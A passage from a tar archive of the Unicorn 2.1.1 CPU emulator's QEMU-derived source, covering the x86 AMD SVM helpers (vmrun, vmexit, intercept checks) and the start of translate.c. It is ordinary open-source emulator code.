exit_info_1; uint64_t exit_info_2; uint32_t exit_int_info; uint32_t exit_int_info_err; uint64_t nested_ctl; uint8_t reserved_4[16]; uint32_t event_inj; uint32_t event_inj_err; uint64_t nested_cr3; uint64_t lbr_ctl; uint8_t reserved_5[832]; }); QEMU_PACK(struct vmcb_seg { uint16_t selector; uint16_t attrib; uint32_t limit; uint64_t base; }); QEMU_PACK(struct vmcb_save_area { struct vmcb_seg es; struct vmcb_seg cs; struct vmcb_seg ss; struct vmcb_seg ds; struct vmcb_seg fs; struct vmcb_seg gs; struct vmcb_seg gdtr; struct vmcb_seg ldtr; struct vmcb_seg idtr; struct vmcb_seg tr; uint8_t reserved_1[43]; uint8_t cpl; uint8_t reserved_2[4]; uint64_t efer; uint8_t reserved_3[112]; uint64_t cr4; uint64_t cr3; uint64_t cr0; uint64_t dr7; uint64_t dr6; uint64_t rflags; uint64_t rip; uint8_t reserved_4[88]; uint64_t rsp; uint8_t reserved_5[24]; uint64_t rax; uint64_t star; uint64_t lstar; uint64_t cstar; uint64_t sfmask; uint64_t kernel_gs_base; uint64_t sysenter_cs; uint64_t sysenter_esp; uint64_t sysenter_eip; uint64_t cr2; uint8_t reserved_6[32]; uint64_t g_pat; uint64_t dbgctl; uint64_t br_from; uint64_t br_to; uint64_t last_excp_from; uint64_t last_excp_to; }); QEMU_PACK(struct vmcb { struct vmcb_control_area control; struct vmcb_save_area save; }); #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/svm_helper.c���������������������������������������������������������0000664�0000000�0000000�00000071714�14675241067�0020454�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 SVM helpers * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. 
*/ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" /* Secure Virtual Machine helpers */ static inline void svm_save_seg(CPUX86State *env, hwaddr addr, const SegmentCache *sc) { CPUState *cs = env_cpu(env); x86_stw_phys(cs, addr + offsetof(struct vmcb_seg, selector), sc->selector); x86_stq_phys(cs, addr + offsetof(struct vmcb_seg, base), sc->base); x86_stl_phys(cs, addr + offsetof(struct vmcb_seg, limit), sc->limit); x86_stw_phys(cs, addr + offsetof(struct vmcb_seg, attrib), ((sc->flags >> 8) & 0xff) | ((sc->flags >> 12) & 0x0f00)); } static inline void svm_load_seg(CPUX86State *env, hwaddr addr, SegmentCache *sc) { CPUState *cs = env_cpu(env); unsigned int flags; sc->selector = x86_lduw_phys(cs, addr + offsetof(struct vmcb_seg, selector)); sc->base = x86_ldq_phys(cs, addr + offsetof(struct vmcb_seg, base)); sc->limit = x86_ldl_phys(cs, addr + offsetof(struct vmcb_seg, limit)); flags = x86_lduw_phys(cs, addr + offsetof(struct vmcb_seg, attrib)); sc->flags = ((flags & 0xff) << 8) | ((flags & 0x0f00) << 12); } static inline void svm_load_seg_cache(CPUX86State *env, hwaddr addr, int seg_reg) { SegmentCache sc1, *sc = &sc1; svm_load_seg(env, addr, sc); cpu_x86_load_seg_cache(env, seg_reg, sc->selector, sc->base, sc->limit, sc->flags); } void helper_vmrun(CPUX86State *env, int aflag, int next_eip_addend) { CPUState *cs = env_cpu(env); target_ulong addr; uint64_t nested_ctl; uint32_t event_inj; uint32_t int_ctl; cpu_svm_check_intercept_param(env, SVM_EXIT_VMRUN, 0, GETPC()); if (aflag == 2) { addr = env->regs[R_EAX]; } else { addr = (uint32_t)env->regs[R_EAX]; } // qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmrun! " TARGET_FMT_lx "\n", addr); env->vm_vmcb = addr; /* save the current CPU state in the hsave page */ x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.gdtr.base), env->gdt.base); x86_stl_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.gdtr.limit), env->gdt.limit); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.idtr.base), env->idt.base); x86_stl_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.idtr.limit), env->idt.limit); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr0), env->cr[0]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr2), env->cr[2]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr3), env->cr[3]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr4), env->cr[4]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.dr6), env->dr[6]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.dr7), env->dr[7]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.efer), env->efer); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rflags), cpu_compute_eflags(env)); svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.es), &env->segs[R_ES]); svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.cs), &env->segs[R_CS]); svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.ss), &env->segs[R_SS]); svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.ds), &env->segs[R_DS]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rip), env->eip + next_eip_addend); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rsp), env->regs[R_ESP]); x86_stq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rax), env->regs[R_EAX]); /* load the interception bitmaps so we do not need to access the vmcb in svm mode */ env->intercept = x86_ldq_phys(cs, env->vm_vmcb + 
offsetof(struct vmcb, control.intercept)); env->intercept_cr_read = x86_lduw_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.intercept_cr_read)); env->intercept_cr_write = x86_lduw_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.intercept_cr_write)); env->intercept_dr_read = x86_lduw_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.intercept_dr_read)); env->intercept_dr_write = x86_lduw_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.intercept_dr_write)); env->intercept_exceptions = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.intercept_exceptions )); nested_ctl = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.nested_ctl)); if (nested_ctl & SVM_NPT_ENABLED) { env->nested_cr3 = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.nested_cr3)); env->hflags2 |= HF2_NPT_MASK; env->nested_pg_mode = 0; if (env->cr[4] & CR4_PAE_MASK) { env->nested_pg_mode |= SVM_NPT_PAE; } if (env->hflags & HF_LMA_MASK) { env->nested_pg_mode |= SVM_NPT_LMA; } if (env->efer & MSR_EFER_NXE) { env->nested_pg_mode |= SVM_NPT_NXE; } } /* enable intercepts */ env->hflags |= HF_GUEST_MASK; env->tsc_offset = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.tsc_offset)); env->gdt.base = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.gdtr.base)); env->gdt.limit = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.gdtr.limit)); env->idt.base = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.idtr.base)); env->idt.limit = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.idtr.limit)); /* clear exit_info_2 so we behave like the real hardware */ x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2), 0); cpu_x86_update_cr0(env, x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr0))); cpu_x86_update_cr4(env, x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr4))); cpu_x86_update_cr3(env, x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr3))); env->cr[2] = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr2)); int_ctl = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.int_ctl)); env->hflags2 &= ~(HF2_HIF_MASK | HF2_VINTR_MASK); if (int_ctl & V_INTR_MASKING_MASK) { env->v_tpr = int_ctl & V_TPR_MASK; env->hflags2 |= HF2_VINTR_MASK; if (env->eflags & IF_MASK) { env->hflags2 |= HF2_HIF_MASK; } } cpu_load_efer(env, x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.efer))); env->eflags = 0; cpu_load_eflags(env, x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rflags)), ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.es), R_ES); svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.cs), R_CS); svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.ss), R_SS); svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.ds), R_DS); env->eip = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rip)); env->regs[R_ESP] = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rsp)); env->regs[R_EAX] = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rax)); env->dr[7] = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.dr7)); env->dr[6] = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.dr6)); /* FIXME: guest state consistency checks */ switch (x86_ldub_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.tlb_ctl))) { case TLB_CONTROL_DO_NOTHING: break; case TLB_CONTROL_FLUSH_ALL_ASID: /* FIXME: 
this is not 100% correct but should work for now */ tlb_flush(cs); break; } env->hflags2 |= HF2_GIF_MASK; if (int_ctl & V_IRQ_MASK) { CPUState *cs = env_cpu(env); cs->interrupt_request |= CPU_INTERRUPT_VIRQ; } /* maybe we need to inject an event */ event_inj = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj)); if (event_inj & SVM_EVTINJ_VALID) { uint8_t vector = event_inj & SVM_EVTINJ_VEC_MASK; // uint16_t valid_err = event_inj & SVM_EVTINJ_VALID_ERR; uint32_t event_inj_err = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj_err)); // qemu_log_mask(CPU_LOG_TB_IN_ASM, "Injecting(%#hx): ", valid_err); /* FIXME: need to implement valid_err */ switch (event_inj & SVM_EVTINJ_TYPE_MASK) { case SVM_EVTINJ_TYPE_INTR: cs->exception_index = vector; env->error_code = event_inj_err; env->exception_is_int = 0; env->exception_next_eip = -1; // qemu_log_mask(CPU_LOG_TB_IN_ASM, "INTR"); /* XXX: is it always correct? */ do_interrupt_x86_hardirq(env, vector, 1); break; case SVM_EVTINJ_TYPE_NMI: cs->exception_index = EXCP02_NMI; env->error_code = event_inj_err; env->exception_is_int = 0; env->exception_next_eip = env->eip; // qemu_log_mask(CPU_LOG_TB_IN_ASM, "NMI"); cpu_loop_exit(cs); break; case SVM_EVTINJ_TYPE_EXEPT: cs->exception_index = vector; env->error_code = event_inj_err; env->exception_is_int = 0; env->exception_next_eip = -1; // qemu_log_mask(CPU_LOG_TB_IN_ASM, "EXEPT"); cpu_loop_exit(cs); break; case SVM_EVTINJ_TYPE_SOFT: cs->exception_index = vector; env->error_code = event_inj_err; env->exception_is_int = 1; env->exception_next_eip = env->eip; // qemu_log_mask(CPU_LOG_TB_IN_ASM, "SOFT"); cpu_loop_exit(cs); break; } // qemu_log_mask(CPU_LOG_TB_IN_ASM, " %#x %#x\n", cs->exception_index, // env->error_code); } } void helper_vmmcall(CPUX86State *env) { cpu_svm_check_intercept_param(env, SVM_EXIT_VMMCALL, 0, GETPC()); raise_exception(env, EXCP06_ILLOP); } void helper_vmload(CPUX86State *env, int aflag) { CPUState *cs = env_cpu(env); target_ulong addr; cpu_svm_check_intercept_param(env, SVM_EXIT_VMLOAD, 0, GETPC()); if (aflag == 2) { addr = env->regs[R_EAX]; } else { addr = (uint32_t)env->regs[R_EAX]; } // qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmload! 
" TARGET_FMT_lx // "\nFS: %016" PRIx64 " | " TARGET_FMT_lx "\n", // addr, x86_ldq_phys(cs, addr + offsetof(struct vmcb, // save.fs.base)), // env->segs[R_FS].base); svm_load_seg_cache(env, addr + offsetof(struct vmcb, save.fs), R_FS); svm_load_seg_cache(env, addr + offsetof(struct vmcb, save.gs), R_GS); svm_load_seg(env, addr + offsetof(struct vmcb, save.tr), &env->tr); svm_load_seg(env, addr + offsetof(struct vmcb, save.ldtr), &env->ldt); #ifdef TARGET_X86_64 env->kernelgsbase = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.kernel_gs_base)); env->lstar = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.lstar)); env->cstar = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.cstar)); env->fmask = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.sfmask)); #endif env->star = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.star)); env->sysenter_cs = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.sysenter_cs)); env->sysenter_esp = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.sysenter_esp)); env->sysenter_eip = x86_ldq_phys(cs, addr + offsetof(struct vmcb, save.sysenter_eip)); } void helper_vmsave(CPUX86State *env, int aflag) { CPUState *cs = env_cpu(env); target_ulong addr; cpu_svm_check_intercept_param(env, SVM_EXIT_VMSAVE, 0, GETPC()); if (aflag == 2) { addr = env->regs[R_EAX]; } else { addr = (uint32_t)env->regs[R_EAX]; } // qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmsave! " TARGET_FMT_lx // "\nFS: %016" PRIx64 " | " TARGET_FMT_lx "\n", // addr, x86_ldq_phys(cs, // addr + offsetof(struct vmcb, save.fs.base)), // env->segs[R_FS].base); svm_save_seg(env, addr + offsetof(struct vmcb, save.fs), &env->segs[R_FS]); svm_save_seg(env, addr + offsetof(struct vmcb, save.gs), &env->segs[R_GS]); svm_save_seg(env, addr + offsetof(struct vmcb, save.tr), &env->tr); svm_save_seg(env, addr + offsetof(struct vmcb, save.ldtr), &env->ldt); #ifdef TARGET_X86_64 x86_stq_phys(cs, addr + offsetof(struct vmcb, save.kernel_gs_base), env->kernelgsbase); x86_stq_phys(cs, addr + offsetof(struct vmcb, save.lstar), env->lstar); x86_stq_phys(cs, addr + offsetof(struct vmcb, save.cstar), env->cstar); x86_stq_phys(cs, addr + offsetof(struct vmcb, save.sfmask), env->fmask); #endif x86_stq_phys(cs, addr + offsetof(struct vmcb, save.star), env->star); x86_stq_phys(cs, addr + offsetof(struct vmcb, save.sysenter_cs), env->sysenter_cs); x86_stq_phys(cs, addr + offsetof(struct vmcb, save.sysenter_esp), env->sysenter_esp); x86_stq_phys(cs, addr + offsetof(struct vmcb, save.sysenter_eip), env->sysenter_eip); } void helper_stgi(CPUX86State *env) { cpu_svm_check_intercept_param(env, SVM_EXIT_STGI, 0, GETPC()); env->hflags2 |= HF2_GIF_MASK; } void helper_clgi(CPUX86State *env) { cpu_svm_check_intercept_param(env, SVM_EXIT_CLGI, 0, GETPC()); env->hflags2 &= ~HF2_GIF_MASK; } void helper_skinit(CPUX86State *env) { cpu_svm_check_intercept_param(env, SVM_EXIT_SKINIT, 0, GETPC()); /* XXX: not implemented */ raise_exception(env, EXCP06_ILLOP); } void helper_invlpga(CPUX86State *env, int aflag) { X86CPU *cpu = env_archcpu(env); target_ulong addr; cpu_svm_check_intercept_param(env, SVM_EXIT_INVLPGA, 0, GETPC()); if (aflag == 2) { addr = env->regs[R_EAX]; } else { addr = (uint32_t)env->regs[R_EAX]; } /* XXX: could use the ASID to see if it is needed to do the flush */ tlb_flush_page(CPU(cpu), addr); } void cpu_svm_check_intercept_param(CPUX86State *env, uint32_t type, uint64_t param, uintptr_t retaddr) { CPUState *cs = env_cpu(env); if (likely(!(env->hflags & HF_GUEST_MASK))) { return; } if ((int32_t)type >= SVM_EXIT_READ_CR0 && 
type <= SVM_EXIT_READ_CR0 + 8) { if (env->intercept_cr_read & (1 << (type - SVM_EXIT_READ_CR0))) { cpu_vmexit(env, type, param, retaddr); } } else if (type >= SVM_EXIT_WRITE_CR0 && type <= SVM_EXIT_WRITE_CR0 + 8) { if (env->intercept_cr_write & (1 << (type - SVM_EXIT_WRITE_CR0))) { cpu_vmexit(env, type, param, retaddr); } } else if (type >= SVM_EXIT_READ_DR0 && type <= SVM_EXIT_READ_DR0 + 7) { if (env->intercept_dr_read & (1 << (type - SVM_EXIT_READ_DR0))) { cpu_vmexit(env, type, param, retaddr); } } else if (type >= SVM_EXIT_WRITE_DR0 && type <= SVM_EXIT_WRITE_DR0 + 7) { if (env->intercept_dr_write & (1 << (type - SVM_EXIT_WRITE_DR0))) { cpu_vmexit(env, type, param, retaddr); } } else if (type >= SVM_EXIT_EXCP_BASE && type <= SVM_EXIT_EXCP_BASE + 31) { if (env->intercept_exceptions & (1 << (type - SVM_EXIT_EXCP_BASE))) { cpu_vmexit(env, type, param, retaddr); } } else if (type == SVM_EXIT_MSR) { if (env->intercept & (1ULL << (SVM_EXIT_MSR - SVM_EXIT_INTR))) { /* FIXME: this should be read in at vmrun (faster this way?) */ uint64_t addr = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.msrpm_base_pa)); uint32_t t0, t1, ecx; ecx = env->regs[R_ECX]; #define XRANGE(x, a, b) (x >= a && x <= b) if (XRANGE(ecx, 0, 0x1fff)) { t0 = (ecx * 2) % 8; t1 = (ecx * 2) / 8; } else if (XRANGE(ecx, 0xc0000000, 0xc0001fff)) { t0 = (8192 + ecx - 0xc0000000) * 2; t1 = (t0 / 8); t0 %= 8; } else if (XRANGE(ecx, 0xc0010000, 0xc0011fff)) { t0 = (16384 + ecx - 0xc0010000) * 2; t1 = (t0 / 8); t0 %= 8; } else { cpu_vmexit(env, type, param, retaddr); t0 = 0; t1 = 0; } #undef XRANGE if (x86_ldub_phys(cs, addr + t1) & ((1 << param) << t0)) { cpu_vmexit(env, type, param, retaddr); } } } else if (env->intercept & (1ULL << (type - SVM_EXIT_INTR))) { cpu_vmexit(env, type, param, retaddr); } } void helper_svm_check_intercept_param(CPUX86State *env, uint32_t type, uint64_t param) { cpu_svm_check_intercept_param(env, type, param, GETPC()); } void helper_svm_check_io(CPUX86State *env, uint32_t port, uint32_t param, uint32_t next_eip_addend) { CPUState *cs = env_cpu(env); if (env->intercept & (1ULL << (SVM_EXIT_IOIO - SVM_EXIT_INTR))) { /* FIXME: this should be read in at vmrun (faster this way?) 
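           Annotation (not in the original source): the IOPM is a bitmap
           with one bit per I/O port. Bits 4..6 of 'param' encode the
           access size in bytes, so 'mask' below selects that many
           consecutive bits; e.g. a 2-byte access to port 0x71 tests
           bits 1..2 of the 16-bit word loaded from
           iopm_base_pa + 0x71 / 8 = iopm_base_pa + 0x0e.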
*/ uint64_t addr = x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.iopm_base_pa)); uint16_t mask = (1 << ((param >> 4) & 7)) - 1; if (x86_lduw_phys(cs, addr + port / 8) & (mask << (port & 7))) { /* next env->eip */ x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2), env->eip + next_eip_addend); cpu_vmexit(env, SVM_EXIT_IOIO, param | (port << 16), GETPC()); } } } void cpu_vmexit(CPUX86State *env, uint32_t exit_code, uint64_t exit_info_1, uintptr_t retaddr) { CPUState *cs = env_cpu(env); cpu_restore_state(cs, retaddr, true); // qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmexit(%08x, %016" PRIx64 ", %016" // PRIx64 ", " TARGET_FMT_lx ")!\n", // exit_code, exit_info_1, // x86_ldq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, // control.exit_info_2)), // env->eip); cs->exception_index = EXCP_VMEXIT + exit_code; env->error_code = exit_info_1; /* remove any pending exception */ env->old_exception = -1; cpu_loop_exit(cs); } void do_vmexit(CPUX86State *env, uint32_t exit_code, uint64_t exit_info_1) { CPUState *cs = env_cpu(env); uint32_t int_ctl; if (env->hflags & HF_INHIBIT_IRQ_MASK) { x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.int_state), SVM_INTERRUPT_SHADOW_MASK); env->hflags &= ~HF_INHIBIT_IRQ_MASK; } else { x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.int_state), 0); } env->hflags2 &= ~HF2_NPT_MASK; /* Save the VM state in the vmcb */ svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.es), &env->segs[R_ES]); svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.cs), &env->segs[R_CS]); svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.ss), &env->segs[R_SS]); svm_save_seg(env, env->vm_vmcb + offsetof(struct vmcb, save.ds), &env->segs[R_DS]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.gdtr.base), env->gdt.base); x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.gdtr.limit), env->gdt.limit); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.idtr.base), env->idt.base); x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.idtr.limit), env->idt.limit); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.efer), env->efer); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr0), env->cr[0]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr2), env->cr[2]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr3), env->cr[3]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cr4), env->cr[4]); int_ctl = x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.int_ctl)); int_ctl &= ~(V_TPR_MASK | V_IRQ_MASK); int_ctl |= env->v_tpr & V_TPR_MASK; if (cs->interrupt_request & CPU_INTERRUPT_VIRQ) { int_ctl |= V_IRQ_MASK; } x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.int_ctl), int_ctl); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rflags), cpu_compute_eflags(env)); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rip), env->eip); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rsp), env->regs[R_ESP]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.rax), env->regs[R_EAX]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.dr7), env->dr[7]); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.dr6), env->dr[6]); x86_stb_phys(cs, env->vm_vmcb + offsetof(struct vmcb, save.cpl), env->hflags & HF_CPL_MASK); /* Reload the host state from vm_hsave */ env->hflags2 &= ~(HF2_HIF_MASK | HF2_VINTR_MASK); env->hflags &= ~HF_GUEST_MASK; env->intercept = 0; 
env->intercept_exceptions = 0; cs->interrupt_request &= ~CPU_INTERRUPT_VIRQ; env->tsc_offset = 0; env->gdt.base = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.gdtr.base)); env->gdt.limit = x86_ldl_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.gdtr.limit)); env->idt.base = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.idtr.base)); env->idt.limit = x86_ldl_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.idtr.limit)); cpu_x86_update_cr0(env, x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr0)) | CR0_PE_MASK); cpu_x86_update_cr4(env, x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr4))); cpu_x86_update_cr3(env, x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.cr3))); /* we need to set the efer after the crs so the hidden flags get set properly */ cpu_load_efer(env, x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.efer))); env->eflags = 0; cpu_load_eflags(env, x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rflags)), ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK | VM_MASK)); svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.es), R_ES); svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.cs), R_CS); svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.ss), R_SS); svm_load_seg_cache(env, env->vm_hsave + offsetof(struct vmcb, save.ds), R_DS); env->eip = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rip)); env->regs[R_ESP] = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rsp)); env->regs[R_EAX] = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.rax)); env->dr[6] = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.dr6)); env->dr[7] = x86_ldq_phys(cs, env->vm_hsave + offsetof(struct vmcb, save.dr7)); /* other setups */ x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_code), exit_code); x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_info_1), exit_info_1); x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_int_info), x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj))); x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_int_info_err), x86_ldl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj_err))); x86_stl_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.event_inj), 0); env->hflags2 &= ~HF2_GIF_MASK; /* FIXME: Resets the current ASID register to zero (host ASID). */ /* Clears the V_IRQ and V_INTR_MASKING bits inside the processor. */ /* Clears the TSC_OFFSET inside the processor. */ /* If the host is in PAE mode, the processor reloads the host's PDPEs from the page table indicated the host's CR3. If the PDPEs contain illegal state, the processor causes a shutdown. */ /* Disables all breakpoints in the host DR7 register. */ /* Checks the reloaded host state for consistency. */ /* If the host's rIP reloaded by #VMEXIT is outside the limit of the host's code segment or non-canonical (in the case of long mode), a #GP fault is delivered inside the host. 
*/
}

unicorn-2.1.1/qemu/target/i386/translate.c

/*
 * i386 translation
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "qemu/host-utils.h"
#include "cpu.h"
#include "exec/exec-all.h"
#include "tcg/tcg-op.h"
#include "exec/cpu_ldst.h"
#include "exec/translator.h"
#include "exec/helper-proto.h"
#include "exec/helper-gen.h"
#include "qemu/compiler.h"
#include "unicorn/platform.h"

#include "uc_priv.h"

#define PREFIX_REPZ   0x01
#define PREFIX_REPNZ  0x02
#define PREFIX_LOCK   0x04
#define PREFIX_DATA   0x08
#define PREFIX_ADR    0x10
#define PREFIX_VEX    0x20

#ifdef TARGET_X86_64
#define CODE64(s) ((s)->code64)
#define REX_X(s) ((s)->rex_x)
#define REX_B(s) ((s)->rex_b)
#else
#define CODE64(s) 0
#define REX_X(s) 0
#define REX_B(s) 0
#endif

#ifdef TARGET_X86_64
# define ctztl  ctz64
# define clztl  clz64
#else
# define ctztl  ctz32
# define clztl  clz32
#endif

/* For a switch indexed by MODRM, match all memory operands for a given OP.
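   As a concrete illustration (annotation, not in the original source):
   for OP == 7 the memory variant expands to the case labels 0x38..0x3f,
   0x78..0x7f and 0xb8..0xbf (mod = 0..2 with any r/m field), while
   CASE_MODRM_OP additionally matches 0xf8..0xff (mod == 3, i.e.
   register operands).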
